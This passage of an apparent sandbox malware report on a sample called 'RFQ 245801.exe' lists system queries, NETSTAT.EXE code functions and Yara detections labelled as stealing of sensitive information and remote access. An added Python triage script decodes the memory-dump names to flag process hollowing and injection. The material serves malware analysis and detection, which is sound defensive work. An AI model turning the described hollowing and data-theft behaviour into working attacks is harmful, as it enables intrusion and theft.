Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_00645FE5 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 7_2_00645FE5
Source: C:\Users\user\Desktop\RFQ 245801.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information

Source: Yara match File source: 5.2.RFQ 245801.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.RFQ 245801.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.4143214191.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.4142849705.0000000002B00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1749545031.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match File source: 5.2.RFQ 245801.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.RFQ 245801.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.4143214191.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.4142849705.0000000002B00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1749545031.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_00644B96 fprintf,GetUdpStatisticsEx,GetIpStatisticsEx,SnmpUtilMemAlloc,fprintf,fprintf,SnmpUtilMemFree,fprintf,fprintf,SnmpUtilMemAlloc,SnmpUtilOidCpy,SnmpUtilVarBindFree,SnmpUtilVarBindFree,SnmpUtilVarBindFree,SnmpUtilVarBindFree,GetIcmpStatisticsEx,GetTcpStatisticsEx, 7_2_00644B96
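The Yara matches listed under "Stealing of Sensitive Information" and "Remote Access Functionality" above name the same five memory dumps, and the dump identifiers encode which process, base address and page protection each match came from. The script below is an added triage example, not part of this report or of Joe Sandbox; it parses those lines and decodes them so an analyst can see at a glance that process 5 (the second RFQ 245801.exe instance) carries execute-writable private memory at 0x400000, which is what a hollowed image looks like, and that NETSTAT.EXE (process 7) holds two further RWX regions. Assumptions that the page does not state: the dump name layout PROC.RUN.DUMPID.BASE.PROTECT.F5.TYPE.F7.sdmp with PROTECT and TYPE using the PAGE_*/MEM_* encoding of MEMORY_BASIC_INFORMATION (fields F5 and F7 are left undecoded), and that process index 0 is the submitted sample. The mapping of index 7 to NETSTAT.EXE and index 5 to RFQ 245801.exe is taken from the "7_2_..." code-function lines and the "5.2.RFQ 245801.exe.400000.0" unpack artefact on this page.

```python
"""Decode Joe Sandbox Yara-match dump identifiers and rank the regions to pull first.

Added example, not from the report. The dump-name layout and the PAGE_*/MEM_*
field encoding are assumptions; fields F5 and F7 are kept raw because their
meaning is not documented on the page.
"""
import re
from dataclasses import dataclass

# Yara match lines copied from the report section above.
REPORT_LINES = [
    "Source: Yara match File source: 5.2.RFQ 245801.exe.400000.0.raw.unpack, type: UNPACKEDPE",
    "Source: Yara match File source: 00000007.00000002.4143214191.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY",
    "Source: Yara match File source: 00000007.00000002.4142849705.0000000002B00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY",
    "Source: Yara match File source: 00000000.00000002.1749545031.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY",
    "Source: Yara match File source: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY",
    "Source: Yara match File source: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY",
]

# Process index -> image. 7 and 5 come from the report's own "7_2_..." and
# "5.2.RFQ 245801.exe..." identifiers; index 0 = submitted sample is an assumption.
PROCESS_NAMES = {0: "RFQ 245801.exe", 5: "RFQ 245801.exe", 7: "NETSTAT.EXE"}

PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# Assumed layout: PROC.RUN.DUMPID.BASE.PROTECT.F5.TYPE.F7.sdmp
DUMP_RE = re.compile(
    r"^(?P<proc>[0-9a-f]{8})\.(?P<run>[0-9a-f]{8})\.(?P<dump>\d+)\."
    r"(?P<base>[0-9a-f]{16})\.(?P<protect>[0-9a-f]{8})\.(?P<f5>[0-9a-f]{8})\."
    r"(?P<memtype>[0-9a-f]{8})\.(?P<f7>[0-9a-f]{8})\.sdmp$", re.IGNORECASE)


@dataclass
class YaraRegion:
    process: int
    run: int
    base: int
    protect: int
    mem_type: int

    @property
    def image(self) -> str:
        return PROCESS_NAMES.get(self.process, f"process #{self.process}")

    @property
    def executable(self) -> bool:
        return (self.protect & 0xF0) != 0          # any PAGE_EXECUTE_* value

    @property
    def writable(self) -> bool:
        return (self.protect & 0xFF) in (0x04, 0x08, 0x40, 0x80)


def parse_yara_memory_lines(lines):
    """Return a YaraRegion for every 'type: MEMORY' match; unpack artefacts are skipped."""
    regions = []
    for line in lines:
        if "type: MEMORY" not in line:
            continue
        name = line.split("File source:", 1)[1].split(",", 1)[0].strip()
        m = DUMP_RE.match(name)
        if not m:
            raise ValueError(f"unrecognised dump name: {name}")
        regions.append(YaraRegion(
            process=int(m["proc"], 16), run=int(m["run"], 16),
            base=int(m["base"], 16), protect=int(m["protect"], 16),
            mem_type=int(m["memtype"], 16)))
    return regions


def triage(regions):
    """Rank regions: 0 = RWX private memory at the 0x400000 image base (a loaded PE
    would be MEM_IMAGE there, so private RWX means the original image was replaced),
    1 = other RWX, 2 = executable, 3 = data (staged payload / config)."""
    rows = []
    for r in regions:
        prot = PAGE_PROTECT.get(r.protect & 0xFF, hex(r.protect))
        kind = MEM_TYPE.get(r.mem_type, hex(r.mem_type))
        if r.executable and r.writable and r.mem_type == 0x20000 and r.base == 0x400000:
            prio, why = 0, "RWX private memory at the image base: hollowed image, dump first"
        elif r.executable and r.writable:
            prio, why = 1, "RWX region: injected code"
        elif r.executable:
            prio, why = 2, "executable region"
        else:
            prio, why = 3, "non-executable: staged/decrypted payload or config"
        rows.append((prio, r.image, r.base, f"{prot}/{kind}: {why}"))
    rows.sort(key=lambda t: (t[0], t[1], t[2]))
    return rows


if __name__ == "__main__":
    for prio, image, base, desc in triage(parse_yara_memory_lines(REPORT_LINES)):
        print(f"[{prio}] {image:16s} {base:#010x}  {desc}")
```

Run it as-is against the lines above and the first row is process 5 at 0x400000 with PAGE_EXECUTE_READWRITE/MEM_PRIVATE; the two NETSTAT.EXE RWX mappings follow, and the PAGE_READWRITE regions in process 0 and 7 (where the .NET loader and the injected FormBook payload keep decrypted data) come last. Swap REPORT_LINES for the Yara section of another report to reuse it.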